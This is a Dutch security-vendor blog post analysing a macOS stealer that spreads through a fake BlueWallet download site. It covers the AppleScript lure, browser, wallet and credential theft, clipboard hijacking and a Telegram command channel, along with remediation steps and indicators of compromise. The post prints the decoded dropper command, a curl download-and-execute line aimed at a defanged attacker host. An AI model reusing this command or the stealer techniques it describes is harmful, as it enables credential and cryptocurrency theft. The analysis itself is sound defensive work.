Privacy, Oplichting, Informatie over bedreigingen

Nep-BlueWallet steelt wachtwoorden, accounts en cryptovaluta van Macs

door Stefan Dasic | 1 juni 2026
Nep-BlueWallet steelt wachtwoorden, accounts en cryptovaluta van Macs

Een valse website die zich voordoet als BlueWallet (een echte Bitcoin-portemonnee) richt zich op Mac met een eenvoudige maar doeltreffende aanval. BlueWallet zelf is niet gehackt. In plaats daarvan hebben cybercriminelen de naam en het merk van de legitieme Bitcoin-portemonnee gestolen om een schadelijke download betrouwbaar te laten lijken.

Als je op zoek was naar een cryptocurrency-portemonnee en op een van deze valse BlueWallet-downloadpagina’s terechtkwam, probeerde de site je te misleiden om een gedownload bestand in een ingebouwd macOS-programma te openen en op ‘Uitvoeren’ te klikken. Als je die instructies hebt opgevolgd, kon de malware opgeslagen wachtwoorden, inloggegevens voor browsers, cryptocurrency-portemonnees, documenten en andere gevoelige gegevens stelen. De malware controleert ook het klembord op adressen van cryptocurrency-portemonnees en kan deze vervangen door adressen die door de aanvaller worden beheerd.

Dat laatste is bijzonder gevaarlijk. Als je een walletadres kopieert voordat je geld verstuurt, kan de malware dit ongemerkt vervangen door het adres van de aanvaller. Op het scherm ziet alles er normaal uit, maar het geld komt ergens anders terecht.

Moet u zich zorgen maken? Alleen als u het bestand hebt gedownload en uitgevoerd. Het lijdt geen kwaad om de pagina alleen maar te bezoeken en weer te sluiten. De aanval is volledig afhankelijk van het feit of de gebruiker het script opent en op 'Afspelen' drukt.

Als u het programma toch hebt uitgevoerd, ga er dan vanuit dat de computer is geïnfecteerd en volg de onderstaande stappen.

Wat moet je doen als je het misschien hebt uitgevoerd?

Als je het bestand hebt geopend en op 'Afspelen' hebt geklikt, ga er dan vanuit dat je apparaat is gehackt en volg deze stappen:

  • Koppel de machine los van het netwerk om het besturingskanaal te onderbreken
  • Voer een volledige scan van het apparaat uit en zorg ervoor dat je up-to-date beveiligingssoftware gebruikt waarbij de webbeveiliging is ingeschakeld
  • Wijzig vanaf een ander, vertrouwd apparaat de wachtwoorden voor alle accounts die op de Mac worden gebruikt, te beginnen met e-mail en cryptovaluta-beurzen
  • Zet elke cryptovaluta over naar een nieuwe wallet die op een ongebruikte apparaat is aangemaakt
  • Beschouw bestaande seed-zinnen en sleutels als kwijt
  • Controleer voortaan, voordat je cryptovaluta verstuurt, het volledige ontvangstadres teken voor teken
  • Controleer of er onbekende bestanden in staan en verwijder deze ~/Library/LaunchAgents
  • Zoek naar een verborgen .sysupd.sh bestand in /tmp
  • Wissel de cloud- en SSH-inloggegevens af als .ssh, .awsof .gnupg er stonden bestanden op de computer
  • Als je twijfelt, maak dan een back-up van je gegevens en installeer macOS opnieuw vanaf een betrouwbare bron, in plaats van te proberen het systeem ter plekke op te schonen

Heb je iets meegenomen wat je beter niet had kunnen meenemen?

Social engineering-trucs

Het meest opmerkelijke aan deze campagne is niet de technische kant ervan. De aanvallers hebben zich niet toegang verschaft tot de Mac hebben de beveiligingsmaatregelen van Apple niet omzeild. Ze hebben de slachtoffers ertoe aangezet de malware zelf uit te voeren.

De valse website leidt gebruikers door het proces met een overtuigende downloadpagina, eenvoudige instructies en zelfs een sneltoets. De aanval slaagt omdat het slachtoffer vertrouwt op wat hij ziet.

Naarmate besturingssystemen steeds beter worden in het blokkeren van schadelijke software, zetten aanvallers steeds vaker in op social engineering. In plaats van manieren te zoeken om beveiligingsmaatregelen te omzeilen, overtuigen ze mensen ervan om deze maatregelen te negeren.

Daarom wordt één gewoonte steeds belangrijker: wees op je hoede voor downloads waarbij je wordt gevraagd om het bestand te openen in een scriptprogramma, een ontwikkelingsprogramma of een Terminal-venster en vervolgens op ‘Uitvoeren’ te klikken.

In deze campagne was één druk op ⌘R voldoende om een Mac te veranderen Mac een programma dat wachtwoorden steelt, cryptovaluta-wallets leegrooft, het klembord kaapt en toegang op afstand biedt.

Technische analyse

Fase één: De AppleScript-downloader

De pagina is te vinden op update-bluewallet[.]com, een domeinnaam die sterk lijkt op de echte portemonnee (bluewallet.io) om er even snel naar te kijken. Het eerste wat de pagina doet, is niet wachten op toestemming. Het script roept een downloadroutine op met een timer van twee seconden zodra de pagina wordt geladen, en nogmaals als de bezoeker op een van de twee knoppen klikt.

Het bestand dat in de map Downloads terechtkomt, heet BlueWallet Installer.applescript, een extensie mensen nog nooit hebben gezien en die ze niet meteen wantrouwen.

Vervolgens doet de pagina iets heel slim. Na een korte pauze herschrijft de pagina zijn eigen statustekst, zodat deze lijkt op installatie-instructies: open het installatieprogramma en druk vervolgens op de afspeelknop of ⌘R. Er wordt zelfs een klein blauw afspeelvinkje in de tekst getekend, zodat de tekst overeenkomt met de echte Script Editor-interface die het slachtoffer straks te zien krijgt.

Nepwebsite van BlueWallet die het slachtoffer door het downloaden en uitvoeren van het schadelijke script loodst

De pagina leidt het slachtoffer stap voor stap door de handelingen die nodig zijn om het bestand uit te voeren.

Op het moderne macOS wordt een niet-ondertekende applicatie die van het internet is gedownload in quarantaine geplaatst en gecontroleerd voordat deze kan worden uitgevoerd. Een gewoon script dat in Script Editor wordt geopend en door de gebruiker wordt uitgevoerd, omzeilt die procedure. De gebruiker geeft handmatig opdracht aan een vertrouwd Apple-programma om code uit te voeren, waardoor er geen notarisatiecontrole is die kan mislukken.

Dit is de reden waarom de aanvaller voor een AppleScript heeft gekozen in plaats van een kant-en-klare app: zo wordt de risicovolle handeling niet meer door het besturingssysteem uitgevoerd, maar door het slachtoffer zelf.

Het AppleScript zelf is opvallend kort. Als je de decoratieve opmerkingen weglaat – waaronder een vals versienummer en een regel die beweert een „Brew Install Upgrade“ te zijn – voert het één enkel base64-gecodeerd shell-commando uit en geeft het vervolgens Script Editor de opdracht om af te sluiten zonder op te slaan, waardoor het bewijsmateriaal uit het zicht verdwijnt.

Brew installeren en updaten

Vertaald betekent dat commando het volgende:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

Het haalt een tweede script op van een externe host, slaat het op in een verborgen bestand in de tijdelijke map, maakt het uitvoerbaar en voert het op de achtergrond uit zonder de uitvoer weer te geven.

Het slachtoffer ziet niets. De bestandsnaam .sysupd.sh is zo gemaskeerd dat het eruitziet als een systeemupdate. Dit is een schoolvoorbeeld van een gefaseerde dropper: de eerste fase is klein en vervangbaar, en heeft als enige taak de echte payload op te halen.

Fase twee: Analyse van de lading

In de eerste regels wordt beschreven hoe de malware te werk gaat. Er wordt umask 077 zodat alles wat het aanmaakt alleen leesbaar is voor de gehackte gebruiker, en vervolgens een verborgen, willekeurig benoemde werkdirectory aanmaakt onder /tmp afkomstig van /dev/urandom.

De configuratie is versleuteld, maar niet erg goed. Een kleine functie met de naam _xd doorloopt een hexadecimale tekenreeks met telkens twee tekens en voert een XOR-bewerking uit op elke byte met een vastgelegde, zich herhalende sleutel: swckR9JCD2Uu.

Die functie decodeert tijdens de uitvoering het Telegram-bot-token, de chat-ID, het secundaire commandotoken en de staging-URL van het script. Dit is voldoende om tools te omzeilen die alleen naar tekstreeksen in leesbare tekst zoeken, maar veel meer ook niet. Omdat zowel de sleutel als het algoritme in het bestand staan, is elke gecodeerde waarde volledig te achterhalen.

Eén detail springt in het oog: de waarde van de gedecodeerde Telegram-chat en die van de gedecodeerde command-and-control-chat zijn identiek. De aanvaller gebruikt één enkel Telegram-kanaal als zowel opslagplaats voor gestolen gegevens als communicatiekanaal. Dit is goedkoop, schaalbaar, versleuteld en valt niet op tussen het gewone HTTPS-verkeer.

Niet alles is versleuteld. De adressen waarmee het klembord wordt gekaapt, staan in het bestand in leesbare tekst: een Bitcoin-adres, een Ethereum-adres en een Solana-adres. Dit zijn de adressen die het implantaat invoert zodra het merkt dat je een walletadres kopieert. Omdat ze openbaar zijn op hun respectievelijke blockchains, behoren ze ook tot de meest bruikbare gegevens in het hele voorbeeld.

Wat de malware steelt

De verzamelroutines van de tweede fase zijn zeer uitgebreid. Ze zijn onderverdeeld in zes brede categorieën.

1. Webbrowsers

Het script haalt de browsegeschiedenis, cookies, inloggegevens en bladwijzers op uit een groot aantal verschillende browsers, waaronder:

  • Op Chromium gebaseerde browsers: Google Chrome , Beta, Canary en Dev; Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; en Yandex
  • Op Firefox gebaseerde browsers: Firefox, Waterfox, Pale Moon, Zen en LibreWolf
  • In de standaardbrowser van macOS opgeslagen gegevens: Safari-cookies, browsegeschiedenis en formulierwaarden

2. Cryptovaluta-wallets

Dit lijkt het belangrijkste aandachtspunt van het script te zijn.

Het is bedoeld voor desktop-wallet-apps zoals Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop en Tonkeeper.

Het richt zich ook opextensie binnen verschillende ecosystemen:

  • Bitcoin: Xverse , Leather, UniSat, Alby en Wizz
  • Solana: Phantom , Solflare, Backpack, Nightly, MagicEden, Sollet en Slope
  • EVM-wallets: MetaMask , Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin en XDEFI
  • Cosmos: Kepler , Station en Cosmostation
  • Andere ecosystemen: Yoroi , Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos en Temple

3. Wachtwoordbeheerders en beveiligingstools

De malware richt zich op de lokale opslag en instellingen van verschillende wachtwoordbeheerders, waaronder LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt en Buttercup.

Het zoekt ook naar gegevens die verband houden met tweefactorauthenticatie (2FA) en authenticatietoepassingen, waaronder Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS en FreeOTP.

4. Communicatie- en sociale apps

Het script probeert sessiegegevens en lokale opslag voor Telegram Desktop en Discord te kopiëren, inclusief Discord Canary en Discord PTB.

5. Ontwikkelaars- en cloudtools

Het zoekt naar inloggegevens en configuratiebestanden in de thuismap van de gebruiker, waaronder:

  • AWS CLI-configuraties in .aws
  • SSH-sleutels invoeren .ssh
  • GnuPG-sleutels invoeren .gnupg
  • Kubernetes-configuraties in .kube
  • Shell- en Git-bestanden, waaronder .zshrc, .zsh_history, .bash_history, en .gitconfig

6. Productiviteitsapps en algemene bestanden

Het script kopieert de lokale Apple Notes-database, NoteStore.sqlite.

Het zoekt ook naarextensie die verband houden met tools voor winkelen en productiviteit, waaronder Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist en Google Keep.

Ten slotte doorzoekt het de mappen Bureaublad, Documenten en Downloads op bestanden met de volgende extensies: .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, en .env, met een maximum voor de omvang.

Wat er met de gestolen gegevens gebeurt

De malware probeert het wachtwoord van de gebruikersaccount rechtstreeks te achterhalen. Een osascript In het dialoogvenster met de titel „Systeemvoorkeuren“ wordt de gebruiker gevraagd zijn wachtwoord opnieuw in te voeren „om door te gaan“. Het script controleert elke poging aan de hand van dscl . authonly voordat het wordt opgeslagen, zodat het pas stopt als het over geldige inloggegevens beschikt.

Voor het exfiltreren slaat het de gefaseerde gegevens op met de eigen ditto, waarschijnlijk omdat het altijd aanwezig is, in tegenstelling tot zip. Om binnen de uploadlimiet van 50 MB van Telegram te blijven, worden grotere archieven opgesplitst in stukken van 49 MB met split voordat u elk onderdeel verstuurt.

Het zorgt voor persistentie door een LaunchAgent-plist naar de map van de gebruiker te schrijven ~/Library/LaunchAgents, ondersteund door een verborgen ondersteuningsmap, en deze laden met launchctl zodat het implantaat bij elke aanmelding opnieuw wordt uitgevoerd.

De 'clipboard hijack' is een live achtergrondloop. Een clip_watch De functie controleert voortdurend het klembord, zoekt met behulp van reguliere expressies naar adresformaten van Bitcoin, Ethereum en Solana, rapporteert het oorspronkelijke adres aan het command-and-control-kanaal en overschrijft het klembord met het adres van de aanvaller via pbcopy.

Dat betekent dat de vervanging onopgemerkt plaatsvindt tijdens het kopiëren en plakken.

Ten slotte kan de malware interactief worden bediend. A c2_loop vraagt de Telegram-bot om commando’s en biedt een complete set operatorfuncties:

  • /info voor systeemgegevens
  • /exec voor willekeurige shell-opdrachten
  • /clipboard om de huidige inhoud van het klembord te lezen
  • /download om bepaalde bestanden op te halen
  • /exfil om de diefstalmodule opnieuw uit te voeren
  • /selfdestruct om sporen uit te wissen

Hierdoor fungeert het Telegram-kanaal als een realtime verbinding voor bediening op afstand, en niet alleen als een eenrichtingskanaal.

Leven van het land, en van Telegram

Dit patroon is bekend en komt steeds vaker voor: vertrouw op tools die al hun sporen hebben verdiend.

De levering maakt misbruik van Apple’s eigen Script Editor. De configuratie is verborgen achter een eenvoudige XOR-versleuteling in plaats van gecomprimeerde binaire bestanden. Het commandokanaal maakt gebruik van de Bot API van Telegram, die door uitgaande filters kan komen die een onbekende server zouden markeren.

Geen van deze onderdelen is op zichzelf nieuw. De effectiviteit zit hem in het combineren van componenten die er legitiem uitzien, zodat geen enkele stap afzonderlijk alarm slaat.

Mogelijkheden voor detectie

De lessen hier gaan minder over de aas en meer over de techniek zelf.

Script-editor die een Base64-code van één regel uitvoert do shell script dat onmiddellijk wordt afgesloten, is een duidelijk gedragssignaal en een veel beter detectiedoelwit dan het tijdelijke fase-1-bestand. Hetzelfde geldt voor een verborgen /tmp/.sysupd.sh gedownload door curl en op de achtergrond gestart.

Browsers en downloadplatforms zouden kunnen omgaan met .applescript bestanden die via het internet binnenkomen, worden met dezelfde argwaan bekeken als uitvoerbare bestanden. En Telegram blijft een onderbelicht medium voor command-and-control, dat door het melden van misbruik van bot-tokens bij de bron zou kunnen worden verstoord.

Indicatoren van inbreuk

Bestandshashes (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Netwerkindicatoren

  • update-bluewallet[.]com
  • projects2026box[.]com

Adressen van klembordkapers

  • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

We rapporteren niet alleen over bedreigingen - we verwijderen ze ook

Cyberbeveiligingsrisico's mogen zich nooit verder verspreiden dan een krantenkop. Houd bedreigingen van uw apparaten door Malwarebytes vandaag nog te downloaden.

Over de auteur

Stefan Dasic

Stefan Dasic

Gepassioneerd door antivirusoplossingen is Stefan al vanaf jonge leeftijd betrokken bij het testen van malware en QA van AV-producten. Als onderdeel van het Malwarebytes team is Stefan toegewijd aan het beschermen van klanten en het waarborgen van hun veiligheid.

LAATSTE ARTIKELEN

Nieuws
week in veiligheid

Een week in de beveiliging (mei 25 – mei 31)

Juni 1, 2026

Een overzicht van de onderwerpen die we in de week van 25 tot en met 31 mei 2026 hebben behandeld

Podcast
Een geïllustreerd hangslot is gemonteerd in een microfoonstandaard met geluidsgolven die uit het apparaat komen.

Betaalapps houden in de gaten wat je zegt (Lock and Code, aflevering 11 van seizoen 7)

Mei 31, 2026

Deze week praten we in de Lock and Code-podcast met Rainey Reitman over financiële censuur waardoor klanten van grote betaalapps worden geweerd.

Nieuws
Signal-logo

Gebruikers van Signal zijn het doelwit van phishingaanvallen waarbij back-ups worden gestolen

Mei 29, 2026

Cybercriminelen doen zich voor als de klantenservice van Signal om back-upherstelsleutels te stelen, waardoor ze toegang krijgen tot het volledige berichtenarchief van hun slachtoffers.

Gerelateerde artikelen

Pictogram medewerkers

Medewerkers

Pictogram Bedreigingscentrum

Bedreigingscentrum

Pictogram Podcasts

Podcast

Woordenlijst

Woordenlijst

Pictogram Zwendel

Oplichting